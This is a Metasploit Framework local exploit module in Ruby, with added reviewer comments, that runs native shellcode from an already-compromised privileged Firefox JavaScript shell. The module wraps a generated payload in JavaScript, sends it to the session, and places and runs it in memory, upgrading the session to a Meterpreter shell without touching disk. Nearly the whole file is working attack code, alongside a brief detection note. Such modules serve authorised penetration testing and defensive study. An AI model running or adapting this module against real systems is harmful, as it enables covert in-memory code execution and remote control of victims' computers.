##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/payload/firefox'

# Local module that runs a native payload from inside an existing privileged
# Firefox JavaScript shell session.
#
# Preconditions visible in this file: it is an Msf::Exploit::Local module and
# talks to an already-established `session`, so it does not provide initial
# access by itself.
#
# Detection note: per the module description the payload is placed in memory,
# given the needed protection flags and called, without touching the disk.
# File-based scanning therefore has nothing to inspect; telemetry on the
# browser process itself is the relevant data source.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking # Missing autodetection, but has widespread targetability

  include Msf::Payload::Firefox
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  # Registers the module metadata and the TIMEOUT option.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   this module's own values through update_info
  def initialize(info = {})
    native_target = [
      'Native Payload', {
        'Platform' => %w[linux osx win unix],
        'Arch'     => ARCH_ALL
      }
    ]

    module_info = {
      'Name'           => 'Firefox Exec Shellcode from Privileged Javascript Shell',
      'Description'    => %q{
        This module allows execution of native payloads from a privileged Firefox Javascript shell.
        It places the specified payload into memory, adds the necessary protection flags,
        and calls it, which can be useful for upgrading a Firefox javascript shell to a Meterpreter
        session without touching the disk.
      },
      'License'        => MSF_LICENSE,
      'Author'         => ['joev'],
      'Platform'       => ['firefox'],
      'DisclosureDate' => 'Mar 10 2014',
      'Targets'        => [native_target],
      'DefaultTarget'  => 0
    }

    super(update_info(info, module_info))

    timeout_option = OptInt.new(
      'TIMEOUT',
      [true, "Maximum time (seconds) to wait for a response", 90]
    )
    register_options([timeout_option])
  end

  # Sends the generated JavaScript to the session and prints whatever the
  # session returns.
  #
  # The script is wrapped in [JAVASCRIPT]...[/JAVASCRIPT] markers on the way
  # out, and the reply is read until the "[!JAVASCRIPT]" token or until the
  # TIMEOUT datastore value elapses.
  def exploit
    print_status "Running the Javascript shell..."

    wrapped_script = "[JAVASCRIPT]#{js_payload}[/JAVASCRIPT]"
    session.shell_write(wrapped_script)

    # NOTE(review): the literal 0 is passed straight through as the second
    # argument; its meaning is defined by shell_read_until_token, which is
    # not part of this file.
    wait_seconds = datastore['TIMEOUT']
    response = session.shell_read_until_token("[!JAVASCRIPT]", 0, wait_seconds)

    # An empty or missing reply is not reported at all.
    return unless response.present?

    # Printed at warning level whether the text is the success string or an
    # exception message sent back by the script.
    print_warning(response)
  end

  # Builds the JavaScript handed to the session.
  #
  # run_payload is not defined in this file; presumably it comes from one of
  # the included mixins. Its output is interpolated inside a try block, so any
  # exception it raises is passed to `send` instead of being lost.
  #
  # @return [String] the script with surrounding whitespace stripped
  def js_payload
    script = %Q|
      (function(send){
        try {
          #{run_payload}
          send("Payload executed.");
        } catch (e) {
          send(e);
        }
      })(send);
    |
    script.strip
  end
end